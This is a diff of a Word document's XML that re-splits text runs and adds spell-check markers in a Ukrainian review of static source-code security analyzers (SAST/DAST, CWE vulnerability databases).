-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -22353,7 +23850,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Перша група включає в себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
+        <w:t xml:space="preserve">Перша група </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>включає в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22387,7 +23906,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів відносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
+        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22421,7 +23962,95 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на різних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори статичного коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто зазначити, що більшість з аналізаторів відносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити різні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
+        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>статичного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто зазначити, що більшість з аналізаторів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22442,7 +24071,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>туп до вихідних текстів відсутн</w:t>
+        <w:t xml:space="preserve">туп до вихідних текстів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ідсутн</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22463,8 +24114,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів відповідності та можливість виконання вимог різних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім світом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (підвантажуваних модулів, використовуваного стороннього</w:t>
-      </w:r>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22473,6 +24125,93 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідповідності та можливість виконання вимог </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>св</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ідвантажуваних модулів, використовуваного стороннього</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> програмного забезпечення і т. д</w:t>
       </w:r>
       <w:r>
@@ -22483,7 +24222,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття рішення по прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
+        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ішення по прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22587,8 +24348,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують різні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і досліджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. Якість власної бази - один з ключових критеріїв, що впливає на загальну якість роботи продукту. Крім того, власна база повинна бути динамічною і постійно оновлюваною - нові вектори атак і експлуатації вразливостей, а також зміни в мовах програмування і методи розробки вимагають від розробників аналізаторів виконувати постійні оновлення бази для збереження високої якості перевірки. Продукти зі статичної неоновлюваної базою найчастіше програють в порівняльних тестах. Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і підтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів в області розробки і захисту програмного забезпечення. Дані документи безпосередньо не описують помилки програмування, на </w:t>
-      </w:r>
+        <w:t xml:space="preserve">. Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22597,8 +24359,227 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>досл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">іджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. Якість власної бази - один з ключових критеріїв, що впливає на загальну якість роботи продукту. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ім того, власна база повинна бути динамічною і постійно оновлюваною - нові вектори атак і експлуатації вразливостей, а також зміни в мовах програмування і методи розробки вимагають від розробників аналізаторів виконувати постійні оновлення бази для збереження високої якості перевірки. Продукти зі статичної неоновлюваної базою найчастіше програють </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>пор</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">івняльних тестах. Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
